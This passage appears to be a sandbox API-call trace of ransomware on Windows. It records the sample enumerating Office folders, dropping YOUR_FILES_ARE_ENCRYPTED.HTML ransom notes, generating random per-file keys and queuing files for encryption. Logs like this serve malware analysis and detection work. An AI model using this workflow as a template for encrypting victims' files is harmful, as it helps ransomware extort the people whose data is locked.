pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com\\54544101-5BBD-4F41-A10F-924E31A9B483") returned 148 [0159.563] lstrcmpW (lpString1="54544101-5BBD-4F41-A10F-924E31A9B483", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.563] PathFindExtensionW (pszPath="54544101-5BBD-4F41-A10F-924E31A9B483") returned="" [0159.563] lstrlenW (lpString="") returned 0 [0159.563] 
PathFindExtensionW (pszPath="54544101-5BBD-4F41-A10F-924E31A9B483") returned="" [0159.563] FindNextFileW (in: hFindFile=0x42f3300, lpFindFileData=0x4ebc90c | out: lpFindFileData=0x4ebc90c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x69aecb90, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x69aecb90, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x69aecb90, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x2071b, dwReserved0=0x0, dwReserved1=0x60, cFileName="CF7D9F32-AF75-437E-863A-A6D7ABB42233", cAlternateFileName="CF7D9F~1")) returned 1 [0159.563] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com\\CF7D9F32-AF75-437E-863A-A6D7ABB42233") returned 148 [0159.563] lstrcmpW (lpString1="CF7D9F32-AF75-437E-863A-A6D7ABB42233", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.563] PathFindExtensionW (pszPath="CF7D9F32-AF75-437E-863A-A6D7ABB42233") returned="" [0159.563] lstrlenW (lpString="") returned 0 [0159.563] PathFindExtensionW (pszPath="CF7D9F32-AF75-437E-863A-A6D7ABB42233") returned="" [0159.563] FindNextFileW (in: hFindFile=0x42f3300, lpFindFileData=0x4ebc90c | out: lpFindFileData=0x4ebc90c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x69aecb90, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x69aecb90, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x69aecb90, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x2071b, dwReserved0=0x0, dwReserved1=0x60, cFileName="CF7D9F32-AF75-437E-863A-A6D7ABB42233", cAlternateFileName="CF7D9F~1")) returned 0 [0159.563] FindClose (in: hFindFile=0x42f3300 | out: hFindFile=0x42f3300) returned 1 [0159.565] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 141 [0159.565] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\16.0\\webservicecache\\allusers\\officeclient.microsoft.com\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0159.567] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebcbd8, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebcbd8*=0x3c00, lpOverlapped=0x0) returned 1 [0159.569] CloseHandle (hObject=0x5ac) returned 1 [0159.569] GetProcessHeap () returned 0x270000 [0159.571] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0159.571] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33b4bbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x69b12cf0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x69b12cf0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="officeclient.microsoft.com", cAlternateFileName="OFFICE~1.COM")) returned 0 [0159.571] FindClose (in: hFindFile=0x42f32c0 | out: hFindFile=0x42f32c0) returned 1 [0159.571] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\YOUR_FILES_ARE_ENCRYPTED.HTML") 
returned 114 [0159.571] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\16.0\\webservicecache\\allusers\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0159.571] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebcee4, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebcee4*=0x3c00, lpOverlapped=0x0) returned 1 [0159.573] CloseHandle (hObject=0x58c) returned 1 [0159.574] GetProcessHeap () returned 0x270000 [0159.574] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0159.574] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33b4bbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x33b4bbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x33b4bbd0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1e12a7c, dwReserved1=0x0, cFileName="AllUsers", cAlternateFileName="")) returned 0 [0159.575] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0159.581] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0159.581] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: 
"c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\16.0\\webservicecache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x590 [0159.581] WriteFile (in: hFile=0x590, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0159.583] CloseHandle (hObject=0x590) returned 1 [0159.584] GetProcessHeap () returned 0x270000 [0159.585] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0159.585] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xef3e1d00, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xef3e1d00, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xef3e1d00, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x197dc, dwReserved0=0x0, dwReserved1=0x60, cFileName="winword.exe_Rules.xml", cAlternateFileName="WINWOR~1.XML")) returned 1 [0159.585] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml") returned 81 [0159.585] lstrcmpW (lpString1="winword.exe_Rules.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.586] PathFindExtensionW (pszPath="winword.exe_Rules.xml") returned=".xml" [0159.586] lstrlenW (lpString=".xml") returned 4 [0159.586] PathFindExtensionW (pszPath="winword.exe_Rules.xml") returned=".xml" [0159.586] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.586] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\16.0\\winword.exe_rules.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0159.587] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=104412) returned 1 [0159.587] GetProcessHeap () returned 0x270000 [0159.587] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0159.591] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="09") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="C9") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="FD") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="D4") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="0F") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="78") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="A8") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="54") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="21") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="82") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="D9") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="52") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="8D") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="88") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="ED") 
returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="DF") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="5D") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="BE") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="1E") returned 2 [0159.592] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="F6") returned 2 [0159.592] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="86") returned 2 [0159.592] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="FD") returned 2 [0159.592] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="DA") returned 2 [0159.592] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="7B") returned 2 [0159.592] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="CB") returned 2 [0159.592] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="10") returned 2 [0159.592] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="6E") returned 2 [0159.592] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="DA") returned 2 [0159.592] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="4C") returned 2 [0159.592] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="80") returned 2 [0159.592] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="02") returned 2 [0159.592] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="30") returned 2 [0159.592] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml" [0159.593] CreateIoCompletionPort (FileHandle=0x590, 
ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.593] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0159.593] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xef3e1d00, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xef3e1d00, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xef3e1d00, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x197dc, dwReserved0=0x0, dwReserved1=0x60, cFileName="winword.exe_Rules.xml", cAlternateFileName="WINWOR~1.XML")) returned 0 [0159.593] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0159.593] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0159.593] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\16.0\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0159.594] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0159.596] CloseHandle (hObject=0x5a8) returned 1 [0159.597] GetProcessHeap () returned 0x270000 [0159.597] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0159.597] FindNextFileW (in: hFindFile=0x42f3200, 
lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ad2f470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x82a878d0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x82a878d0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="OTele", cAlternateFileName="")) returned 1 [0159.598] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele") returned 60 [0159.598] GetProcessHeap () returned 0x270000 [0159.598] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0159.598] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele" [0159.598] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\*" [0159.598] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ad2f470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x82a878d0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x82a878d0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0159.601] FindNextFileW 
(in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ad2f470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x82a878d0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x82a878d0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.603] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf1e947a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1e947a0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1e947a0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x11b, dwReserved0=0x0, dwReserved1=0x60, cFileName="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTele.dat", cAlternateFileName="{1C990~2.DAT")) returned 1 [0159.603] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTele.dat") returned 136 [0159.603] lstrcmpW (lpString1="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTele.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.604] PathFindExtensionW (pszPath="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTele.dat") returned=".dat" [0159.604] lstrlenW (lpString=".dat") returned 4 [0159.604] PathFindExtensionW (pszPath="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTele.dat") returned=".dat" [0159.604] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.604] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTele.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{1c9909c9-fd1c-4e1b-870c-6b753d804628} (0) - 2028 - winword.exe - otele.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0159.616] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=283) returned 1 [0159.616] CloseHandle (hObject=0x590) returned 1 [0159.616] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf1e947a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1e947a0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1e947a0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x34d, dwReserved0=0x0, dwReserved1=0x60, cFileName="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTeleMediumCost.dat", cAlternateFileName="{1C990~1.DAT")) returned 1 [0159.616] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTeleMediumCost.dat") returned 146 [0159.616] lstrcmpW (lpString1="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTeleMediumCost.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.616] PathFindExtensionW (pszPath="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTeleMediumCost.dat") returned=".dat" [0159.616] lstrlenW (lpString=".dat") returned 4 [0159.616] PathFindExtensionW (pszPath="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - 
OTeleMediumCost.dat") returned=".dat" [0159.616] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.616] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTeleMediumCost.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{1c9909c9-fd1c-4e1b-870c-6b753d804628} (0) - 2028 - winword.exe - otelemediumcost.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0159.617] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=845) returned 1 [0159.617] GetProcessHeap () returned 0x270000 [0159.617] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0159.617] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="FD") returned 2 [0159.617] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="17") returned 2 [0159.617] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="D5") returned 2 [0159.617] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="AF") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="99") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="54") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="08") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="9E") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="69") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="31") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="E4") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd13e, 
param_2="%02X" | out: param_1="5B") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="F3") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="93") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="71") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="98") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="4C") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="08") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="D3") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="AB") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="F9") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="66") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="25") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="76") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="CA") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="B5") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="EB") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="11") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="BB") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="59") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="60") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="0F") returned 2 [0159.619] lstrcpyW (in: lpString1=0x74d20bc, 
lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTeleMediumCost.dat" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTeleMediumCost.dat") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTeleMediumCost.dat" [0159.619] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.619] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0159.619] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: 